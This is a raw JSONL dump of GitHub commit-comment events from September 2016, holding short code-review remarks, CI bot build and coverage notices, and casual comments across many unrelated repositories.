{"id":"4574426647","type":"CommitCommentEvent","actor":{"login":"bix0r"},"repo":{"name":"stjornvisi/Stjornvisi"},"payload":{"comment":{"id":19055225,"position":null,"line":null,"path":null,"commit_id":"255adb0ad379234097baf5e527bff8a0d37dc453","created_at":"2016-09-16T14:39:11Z","updated_at":"2016-09-16T14:39:11Z","body":" #STJORNV-96"}},"created_at":"2016-09-16T14:39:11Z"}
{"id":"4574429391","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19055230,"position":13,"line":56,"path":"shared/src/main/scala/Syntax.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-16T14:39:37Z","updated_at":"2016-09-16T14:39:37Z","body":"Oh actually this is probably wrong, because we have the `secret()` function"}},"created_at":"2016-09-16T14:39:37Z"}
{"id":"4574437025","type":"CommitCommentEvent","actor":{"login":"eurosecom"},"repo":{"name":"eurosecom/projekt1"},"payload":{"comment":{"id":19055242,"position":null,"line":null,"path":null,"commit_id":"9bc31e48860f7c4d3cbdfb39ba82fe34ffbea3fe","created_at":"2016-09-16T14:40:55Z","updated_at":"2016-09-16T14:40:55Z","body":"Nie to sa nedá, jeden zamestnanec je jeden XML súbor so všetkými položkami,  nemôže byť jeden zamestnanec dva XML súbory."}},"created_at":"2016-09-16T14:40:55Z"}
{"id":"4574437498","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055245,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:40:59Z","updated_at":"2016-09-16T14:40:59Z","body":"Done"}},"created_at":"2016-09-16T14:40:59Z"}
{"id":"4574437886","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19055247,"position":64,"line":161,"path":"db.py","commit_id":"bd56a03665fd1385a715552962cc92be932c1edf","created_at":"2016-09-16T14:41:03Z","updated_at":"2016-09-16T14:41:03Z","body":"Done."}},"created_at":"2016-09-16T14:41:03Z"}
{"id":"4574437956","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19055248,"position":null,"line":null,"path":null,"commit_id":"be3d9c47d6445dd01850ccf9fd79abcde6f42388","created_at":"2016-09-16T14:41:04Z","updated_at":"2016-09-16T14:41:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KfbslBcjRputq8CgP-XHZQ"}},"created_at":"2016-09-16T14:41:04Z"}
{"id":"4574440604","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19055252,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:41:31Z","updated_at":"2016-09-16T14:41:31Z","body":"The limitation is mostly for controlling the size. Like dashboard list.\r\n\r\nI did consider a dropdown. But I feelt that the two main use cases for viewing state changes are\r\n * Go back in time and see what alert changes state. \r\n * See recently changed states.  \r\n\r\nI agree that the checkbox feels weird. But the dropdown did as well. \r\n\r\nMaybe we should remove it and always use the dashboard time range since you can have \"last Xmin\" or between X and X \r\n"}},"created_at":"2016-09-16T14:41:31Z"}
{"id":"4574448192","type":"CommitCommentEvent","actor":{"login":"b-t-daichi"},"repo":{"name":"plusize-group-work-c/calendar"},"payload":{"comment":{"id":19055268,"position":222,"line":129,"path":"src/main/java/jp/co/plusize/calendar/web/AbstractWebMethod.java","commit_id":"45c6a5eabc29af8607ad85657be9f73fbfc7a4c7","created_at":"2016-09-16T14:42:49Z","updated_at":"2016-09-16T14:42:49Z","body":"java7からのtry-with-resources 文を利用しているため、ストリームのclose処理は不要となります。"}},"created_at":"2016-09-16T14:42:49Z"}
{"id":"4574449731","type":"CommitCommentEvent","actor":{"login":"davewasmer"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19055275,"position":null,"line":null,"path":null,"commit_id":"b4d1fb89fa9fd410d3742b8280d6b5e6c028fc31","created_at":"2016-09-16T14:43:06Z","updated_at":"2016-09-16T14:43:06Z","body":"👍  thanks!"}},"created_at":"2016-09-16T14:43:06Z"}
{"id":"4574452275","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055279,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:43:31Z","updated_at":"2016-09-16T14:43:31Z","body":"sei morgen im forum da 20.000 user sich melden update geht nicht mehr , haha"}},"created_at":"2016-09-16T14:43:31Z"}
{"id":"4574454327","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19055290,"position":null,"line":null,"path":null,"commit_id":"f185ada91be7a54a75f92f440f279da2218fce86","created_at":"2016-09-16T14:43:52Z","updated_at":"2016-09-16T14:43:52Z","body":"[Code coverage](https://114-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.52%**"}},"created_at":"2016-09-16T14:43:52Z"}
{"id":"4574454598","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-vlee1"},"payload":{"comment":{"id":19055293,"position":51,"line":64,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"e5130483a31497c40c0ff6e9f31628ad692e5de8","created_at":"2016-09-16T14:43:54Z","updated_at":"2016-09-16T14:43:54Z","body":"goog exception testing. However the tests for SantaInAnElevator should be in their own class called SantaInAnElevatorTest.  It looks like you had created that class but removed it - that really was the correct approach!"}},"created_at":"2016-09-16T14:43:54Z"}
{"id":"4574455554","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19055296,"position":25,"line":59,"path":"src/main/kotlin/org/rust/lang/core/symbols/RustPath.kt","commit_id":"0095b8974f0a74ebcc7a675fb9fbdae0cdbe6e10","created_at":"2016-09-16T14:44:06Z","updated_at":"2016-09-16T14:44:06Z","body":"Ok, here we go: https://github.com/intellij-rust/intellij-rust/commit/00ce4c5dd313905cb9f6e35c4f0c35d673ed0433."}},"created_at":"2016-09-16T14:44:06Z"}
{"id":"4574455598","type":"CommitCommentEvent","actor":{"login":"rolaroluda"},"repo":{"name":"rolaroluda/rol-o"},"payload":{"comment":{"id":19055297,"position":null,"line":null,"path":null,"commit_id":"22a264690cf0c92ff3e5cd11e3a565c301aad25b","created_at":"2016-09-16T14:44:07Z","updated_at":"2016-09-16T14:44:07Z","body":"mto loko"}},"created_at":"2016-09-16T14:44:07Z"}
{"id":"4574456042","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055300,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:44:12Z","updated_at":"2016-09-16T14:44:12Z","body":"Bau halt schneller neu, damit es nur 10 000 sind ;)"}},"created_at":"2016-09-16T14:44:12Z"}
{"id":"4574456533","type":"CommitCommentEvent","actor":{"login":"rolaroluda"},"repo":{"name":"rolaroluda/rol-o"},"payload":{"comment":{"id":19055301,"position":null,"line":null,"path":null,"commit_id":"22a264690cf0c92ff3e5cd11e3a565c301aad25b","created_at":"2016-09-16T14:44:16Z","updated_at":"2016-09-16T14:44:16Z","body":"dahora meu"}},"created_at":"2016-09-16T14:44:16Z"}
{"id":"4574456895","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19055302,"position":null,"line":null,"path":null,"commit_id":"1fe267e49216dc2a3f2583071525ee246b5c4bc3","created_at":"2016-09-16T14:44:18Z","updated_at":"2016-09-16T14:44:18Z","body":"[Code coverage](https://115-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.52%**"}},"created_at":"2016-09-16T14:44:18Z"}
{"id":"4574457572","type":"CommitCommentEvent","actor":{"login":"rolaroluda"},"repo":{"name":"rolaroluda/rol-o"},"payload":{"comment":{"id":19055305,"position":2,"line":2,"path":"README.md","commit_id":"22a264690cf0c92ff3e5cd11e3a565c301aad25b","created_at":"2016-09-16T14:44:26Z","updated_at":"2016-09-16T14:44:26Z","body":"pika"}},"created_at":"2016-09-16T14:44:26Z"}
{"id":"4574459563","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19055306,"position":null,"line":null,"path":null,"commit_id":"dd9793721ea973c0d42ab387afbe8c29e19b4976","created_at":"2016-09-16T14:44:48Z","updated_at":"2016-09-16T14:44:48Z","body":"TeamCity Todo :: Build [Build 113](http://109.103.226.38:8512/viewLog.html?buildId=38508&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T14:44:48Z"}
{"id":"4574459840","type":"CommitCommentEvent","actor":{"login":"stefanonepa"},"repo":{"name":"epfl-dojo/vue-sierpinsky"},"payload":{"comment":{"id":19055307,"position":null,"line":null,"path":null,"commit_id":"b69ac2549de55a5c0be8a34073e088c06b9c24c0","created_at":"2016-09-16T14:44:51Z","updated_at":"2016-09-16T14:44:51Z","body":":clap: "}},"created_at":"2016-09-16T14:44:51Z"}
{"id":"4574460873","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19055309,"position":null,"line":null,"path":null,"commit_id":"dd9793721ea973c0d42ab387afbe8c29e19b4976","created_at":"2016-09-16T14:45:01Z","updated_at":"2016-09-16T14:45:01Z","body":"TeamCity Todo :: Build [Build 113](http://109.103.226.38:8512/viewLog.html?buildId=38508&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 19 Build time: 00:00:07"}},"created_at":"2016-09-16T14:45:01Z"}
{"id":"4574461864","type":"CommitCommentEvent","actor":{"login":"auremoser"},"repo":{"name":"mozilla/science.mozilla.org"},"payload":{"comment":{"id":19055316,"position":null,"line":null,"path":null,"commit_id":"fcdfd7a67b1f50e59c312ce2e14d8042ac4bad79","created_at":"2016-09-16T14:45:14Z","updated_at":"2016-09-16T14:45:14Z","body":"I thought \"develop\" was staging, whoops. O.k. merged to master! Thank you @alanmoo "}},"created_at":"2016-09-16T14:45:14Z"}
{"id":"4574466437","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"gajus/eslint-plugin-flowtype"},"payload":{"comment":{"id":19055324,"position":null,"line":null,"path":null,"commit_id":"eedcac762eae38cf6030a0b816b86dcb0a2fdfd3","created_at":"2016-09-16T14:45:57Z","updated_at":"2016-09-16T14:45:57Z","body":"@danharper I'd like to revert this change.\r\n\r\nWhile maintaining a lot of ESLint configurations, I have learned that keeping a configuration in JSON format makes the config more readable. This is primarily because JSON enforces consistent use of quotes for all string keys/values.\r\n\r\nThe simplest thing to do is to keep config in JSON and use `jsonlint` to format the file precommit, e.g.\r\n\r\n```bash\r\njsonlint --sort-keys --in-place --indent '  ' ./recommended.json && echo '' >> ./recommended.json\r\n```\r\n\r\nIf you are happy with me reverting the change, I will revert the change, fix the linting issue and add jsonlint script in precommit hook."}},"created_at":"2016-09-16T14:45:57Z"}
{"id":"4574468973","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"UCL-INGI/INGInious"},"payload":{"comment":{"id":19055329,"position":47,"line":108,"path":"inginious/frontend/webapp/templates/course_admin/edit_tabs/basic.html","commit_id":"fd7bbc410375eb641b06a990d82012cbb9171ce2","created_at":"2016-09-16T14:46:24Z","updated_at":"2016-09-16T14:46:24Z","body":"This \"height: 20px\" does not render correctly on firefox. The bar is so small that it is impossible to see the numbers."}},"created_at":"2016-09-16T14:46:24Z"}
{"id":"4574470541","type":"CommitCommentEvent","actor":{"login":"mirthli"},"repo":{"name":"mirthli/Github-basics"},"payload":{"comment":{"id":19055332,"position":1,"line":1,"path":"yyy.txt","commit_id":"5fa01cb2f96bde63e64eebfe54ea9ccefad38ed7","created_at":"2016-09-16T14:46:40Z","updated_at":"2016-09-16T14:46:40Z","body":"mycomment"}},"created_at":"2016-09-16T14:46:40Z"}
{"id":"4574472761","type":"CommitCommentEvent","actor":{"login":"mirthli"},"repo":{"name":"mirthli/Github-basics"},"payload":{"comment":{"id":19055337,"position":21,"line":21,"path":"glossary.html","commit_id":"47069bb43eed3f99e49a84bf0a7c1ac627d32436","created_at":"2016-09-16T14:47:03Z","updated_at":"2016-09-16T14:47:03Z","body":"sdfd"}},"created_at":"2016-09-16T14:47:03Z"}
{"id":"4574473531","type":"CommitCommentEvent","actor":{"login":"mirthli"},"repo":{"name":"mirthli/Github-basics"},"payload":{"comment":{"id":19055342,"position":32,"line":32,"path":"glossary.html","commit_id":"47069bb43eed3f99e49a84bf0a7c1ac627d32436","created_at":"2016-09-16T14:47:12Z","updated_at":"2016-09-16T14:47:12Z","body":"jhty"}},"created_at":"2016-09-16T14:47:12Z"}
{"id":"4574475292","type":"CommitCommentEvent","actor":{"login":"fuychen"},"repo":{"name":"fuychen/Doughnut-Shop-Online"},"payload":{"comment":{"id":19055345,"position":null,"line":null,"path":null,"commit_id":"0a31a1f7868b7b122093fb78f47a810df0a3075b","created_at":"2016-09-16T14:47:29Z","updated_at":"2016-09-16T14:47:29Z","body":"天猫上一些食品旗舰店的首页布局"}},"created_at":"2016-09-16T14:47:29Z"}
{"id":"4574476589","type":"CommitCommentEvent","actor":{"login":"omidfi"},"repo":{"name":"Rookies-RGSOC2016/hoodie-electron-app"},"payload":{"comment":{"id":19055349,"position":null,"line":null,"path":null,"commit_id":"070666c496fb6c4be807e29300a163a0e6c9f3cd","created_at":"2016-09-16T14:47:41Z","updated_at":"2016-09-16T14:47:41Z","body":"> \r\n> I'm trying to figure out how to use 'function' from API by writing like this (For example)\r\n> \r\n> route('/', function () {\r\n>       self.show = true\r\n>       Apps.findAll().then(function (apps) {\r\n>         self.apps = apps\r\n>         self.update()\r\n>       })\r\n>     })\r\n> Here instead of writing API.findAll(), why we need to use 'Apps' ?:)"}},"created_at":"2016-09-16T14:47:41Z"}
{"id":"4574478551","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19055356,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:48:02Z","updated_at":"2016-09-16T14:48:02Z","body":"yes, but for your first case wont you almost always want a fixed time range (and not the dashboard time range)?\r\n\r\n"}},"created_at":"2016-09-16T14:48:02Z"}
{"id":"4574487618","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19055367,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:49:33Z","updated_at":"2016-09-16T14:49:33Z","body":"the checkbox / or dropdown should be \r\n\r\nLimit by: [Count, Time Range] \r\n\r\nwhen Time Range: <blank to use dashoard time range, otherwise specify a timespan backward in time, like '6h')"}},"created_at":"2016-09-16T14:49:33Z"}
{"id":"4574490383","type":"CommitCommentEvent","actor":{"login":"danharper"},"repo":{"name":"gajus/eslint-plugin-flowtype"},"payload":{"comment":{"id":19055371,"position":null,"line":null,"path":null,"commit_id":"eedcac762eae38cf6030a0b816b86dcb0a2fdfd3","created_at":"2016-09-16T14:50:05Z","updated_at":"2016-09-16T14:50:05Z","body":"Sure, I only did it to quickly deploy a fix when 2.17.0 failed as Babel didn't copy the JSON file into the build and I didn't know exactly why, but that's fixed now so :+1:"}},"created_at":"2016-09-16T14:50:05Z"}
{"id":"4574490561","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"rizaumami/kbbi"},"payload":{"comment":{"id":19055372,"position":1,"line":732,"path":"teks/A.txt","commit_id":"bf4efa6ed3adc153a71da98be58d0dc21ffdabfb","created_at":"2016-09-16T14:50:07Z","updated_at":"2016-09-16T14:50:07Z","body":"**lema** `jenis kata` _deskripsi (kebetulan singkat hanya satu kata)_"}},"created_at":"2016-09-16T14:50:07Z"}
{"id":"4574494989","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19055379,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T14:50:53Z","updated_at":"2016-09-16T14:50:53Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-16T14:50:53Z"}
{"id":"4574497322","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19055386,"position":null,"line":null,"path":null,"commit_id":"00f3d8f5d35eee2d6c2e8a6b90008cb6162fff8f","created_at":"2016-09-16T14:51:19Z","updated_at":"2016-09-16T14:51:19Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XAR__JN5Tk6TkMYkxaNaxQ"}},"created_at":"2016-09-16T14:51:19Z"}
{"id":"4574498351","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"rizaumami/kbbi"},"payload":{"comment":{"id":19055393,"position":2,"line":733,"path":"teks/A.txt","commit_id":"bf4efa6ed3adc153a71da98be58d0dc21ffdabfb","created_at":"2016-09-16T14:51:30Z","updated_at":"2016-09-16T14:51:30Z","body":"**lema** `jenis kata` _deskripsi_, _contoh_"}},"created_at":"2016-09-16T14:51:30Z"}
{"id":"4574499106","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19055397,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-16T14:51:38Z","updated_at":"2016-09-16T14:51:38Z","body":"Ah, I have created it in IIS 10 but it didn't response any data, even the Server-Version.\r\nThis time I put it into LAMP, and I am sure that the required extension is on.Unfortunately failed either, it reported 500 after initializing environment.\r\n\r\n> \tif($REQUEST_SUCCESS == false)\r\n\t{\r\n\t\t$output = [\r\n\t\t\t\"code\" => 10000,\r\n\t\t\t\"message\" => $contents\r\n\t\t];\r\n![qq 20160916225057](https://cloud.githubusercontent.com/assets/21981102/18590088/15e93854-7c60-11e6-87c5-b490df610844.png)\r\n"}},"created_at":"2016-09-16T14:51:38Z"}
{"id":"4574509320","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"rizaumami/kbbi"},"payload":{"comment":{"id":19055420,"position":6,"line":736,"path":"teks/A.txt","commit_id":"bf4efa6ed3adc153a71da98be58d0dc21ffdabfb","created_at":"2016-09-16T14:53:24Z","updated_at":"2016-09-16T14:53:24Z","body":"**lema** `jenis kata` (nomer urut) _deskripsi pertama_; (nomer urut) _deskripsi kedua_;"}},"created_at":"2016-09-16T14:53:24Z"}
{"id":"4574510032","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19055425,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:53:29Z","updated_at":"2016-09-16T14:53:29Z","body":"lets discuss this over :beers: :)"}},"created_at":"2016-09-16T14:53:29Z"}
{"id":"4574510302","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19055426,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T14:53:32Z","updated_at":"2016-09-16T14:53:32Z","body":"Οχι"}},"created_at":"2016-09-16T14:53:32Z"}
{"id":"4574510349","type":"CommitCommentEvent","actor":{"login":"mateng27"},"repo":{"name":"mateng27/mateng27.github.io"},"payload":{"comment":{"id":19055427,"position":null,"line":null,"path":null,"commit_id":"f9cdfc652f7ca993266a95c60214e6ab8995b2e5","created_at":"2016-09-16T14:53:33Z","updated_at":"2016-09-16T14:53:33Z","body":"f"}},"created_at":"2016-09-16T14:53:33Z"}
{"id":"4574512889","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"rizaumami/kbbi"},"payload":{"comment":{"id":19055435,"position":8,"line":738,"path":"teks/A.txt","commit_id":"bf4efa6ed3adc153a71da98be58d0dc21ffdabfb","created_at":"2016-09-16T14:53:58Z","updated_at":"2016-09-16T14:53:58Z","body":"**lema** -> _sinonim yang sudah diartikan sebelumnya_"}},"created_at":"2016-09-16T14:53:58Z"}
{"id":"4574519505","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19055449,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-16T14:55:00Z","updated_at":"2016-09-16T14:55:00Z","body":"Ubuntu 15.10: \"make posix_\" does not auto-complete\n\n\nOn Fri, Sep 16, 2016 at 7:58 AM Roman Bapst <notifications@github.com>\nwrote:\n\n> @kd0aij <https://github.com/kd0aij> On what OS are you on? The other\n> targets are working on linux.\n>\n> —\n> You are receiving this because you were mentioned.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/PX4/Firmware/commit/900026818b772ef848749e366b722817b3fc6fc4#commitcomment-19054562>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACMZPa0NwzSd1DhBtclGcwXWt8rSUrzwks5qqqB1gaJpZM4J-w0Z>\n> .\n>\n"}},"created_at":"2016-09-16T14:55:00Z"}
{"id":"4574519523","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19055450,"position":21,"line":3129,"path":"pkg/api/validation/validation.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-16T14:55:00Z","updated_at":"2016-09-16T14:55:00Z","body":"Should not increase the total size limit from what it is today"}},"created_at":"2016-09-16T14:55:00Z"}
{"id":"4574521706","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19055454,"position":null,"line":null,"path":null,"commit_id":"cb11236e685ee38518955ce895390f1e550f0b74","created_at":"2016-09-16T14:55:23Z","updated_at":"2016-09-16T14:55:23Z","body":"icons both variants are now one package, using symlinks in the dark icon-theme for the ones that are the same."}},"created_at":"2016-09-16T14:55:23Z"}
{"id":"4574522003","type":"CommitCommentEvent","actor":{"login":"palewire"},"repo":{"name":"california-civic-data-coalition/california-civic-data-coalition.github.io"},"payload":{"comment":{"id":19055455,"position":null,"line":null,"path":null,"commit_id":"fc59385e19a50f532fd44bea096b310582cc620a","created_at":"2016-09-16T14:55:26Z","updated_at":"2016-09-16T14:55:26Z","body":"I had to fuck something up."}},"created_at":"2016-09-16T14:55:26Z"}
{"id":"4574522190","type":"CommitCommentEvent","actor":{"login":"kapowaz"},"repo":{"name":"deliveroo/deliveroo.engineering"},"payload":{"comment":{"id":19055457,"position":null,"line":null,"path":null,"commit_id":"01f0448f6a38d558f101b62f86ed99af81565c93","created_at":"2016-09-16T14:55:28Z","updated_at":"2016-09-16T14:55:28Z","body":"LGTM"}},"created_at":"2016-09-16T14:55:28Z"}
{"id":"4574522394","type":"CommitCommentEvent","actor":{"login":"abresler"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19055458,"position":13,"line":25,"path":"DESCRIPTION","commit_id":"3ec3765ceeccfc58de2bae92ac76edebf0a33e48","created_at":"2016-09-16T14:55:30Z","updated_at":"2016-09-16T14:55:30Z","body":"Yup need it, I believe it is on CRAN?\n\n----------------------\nAlex Bresler\nabresler@asbcllc.com\n\n​www.asbcllc.com​\n\n917-455-0239 (cell)\n\nOn Sep 15, 2016 11:36 PM, \"timelyportfolio\" <notifications@github.com>\nwrote:\n\n> curlconverter?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/abresler/fundManageR/commit/3ec3765ceeccfc58de2bae92ac76edebf0a33e48#commitcomment-19048125>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtM1K7RPX_o7rLi2ndz2iDBdNAxpmgUks5qqg7QgaJpZM4J-kSP>\n> .\n>\n"}},"created_at":"2016-09-16T14:55:30Z"}
{"id":"4574523011","type":"CommitCommentEvent","actor":{"login":"domenic"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19055459,"position":261,"line":5070,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T14:55:36Z","updated_at":"2016-09-16T14:55:36Z","body":"It should be « _options_ »"}},"created_at":"2016-09-16T14:55:36Z"}
{"id":"4574523298","type":"CommitCommentEvent","actor":{"login":"GuillaumeDerval"},"repo":{"name":"UCL-INGI/INGInious"},"payload":{"comment":{"id":19055461,"position":47,"line":108,"path":"inginious/frontend/webapp/templates/course_admin/edit_tabs/basic.html","commit_id":"fd7bbc410375eb641b06a990d82012cbb9171ce2","created_at":"2016-09-16T14:55:39Z","updated_at":"2016-09-16T14:55:39Z","body":"fixed in 864cee0fda24f605e5f5e4414237b18dca94c6ba"}},"created_at":"2016-09-16T14:55:39Z"}
{"id":"4574524637","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"rizaumami/kbbi"},"payload":{"comment":{"id":19055464,"position":1,"line":1728,"path":"teks/B.txt","commit_id":"bf4efa6ed3adc153a71da98be58d0dc21ffdabfb","created_at":"2016-09-16T14:55:53Z","updated_at":"2016-09-16T14:55:53Z","body":"**lema** /`pengucapan`/ `jenis kata` _deskripsi pertama_; _deskripsi lainnya_"}},"created_at":"2016-09-16T14:55:53Z"}
{"id":"4574524843","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19055465,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-16T14:55:55Z","updated_at":"2016-09-16T14:55:55Z","body":"Please remove such binary blobs from repository.  You'll never make the git repository smaller :(.  Up to that, within such changes might be hidden ugly things :)"}},"created_at":"2016-09-16T14:55:55Z"}
{"id":"4574532885","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19055489,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-16T14:57:21Z","updated_at":"2016-09-16T14:57:21Z","body":"I would expect to use `utf8.Valid` if we wanted to sniff (which I really don't), or have a separate arg (--from-binary-file) and just validate content from literals and --from-file args is valid utf8"}},"created_at":"2016-09-16T14:57:21Z"}
{"id":"4574535698","type":"CommitCommentEvent","actor":{"login":"wlach"},"repo":{"name":"mozilla/mozregression"},"payload":{"comment":{"id":19055494,"position":null,"line":null,"path":null,"commit_id":"ad76910fd0dfefb20697ca1fda18db71615bd8fd","created_at":"2016-09-16T14:57:51Z","updated_at":"2016-09-16T14:57:51Z","body":"I will investigate what's involved here. :)"}},"created_at":"2016-09-16T14:57:51Z"}
{"id":"4574539826","type":"CommitCommentEvent","actor":{"login":"lucyking"},"repo":{"name":"lucyking/leetcode"},"payload":{"comment":{"id":19055506,"position":null,"line":null,"path":null,"commit_id":"3ab492e019326fda1f1a891e8c74a9098a60068c","created_at":"2016-09-16T14:58:35Z","updated_at":"2016-09-16T14:58:35Z","body":"float('inf')\r\n\r\n1/inf =0.0"}},"created_at":"2016-09-16T14:58:35Z"}
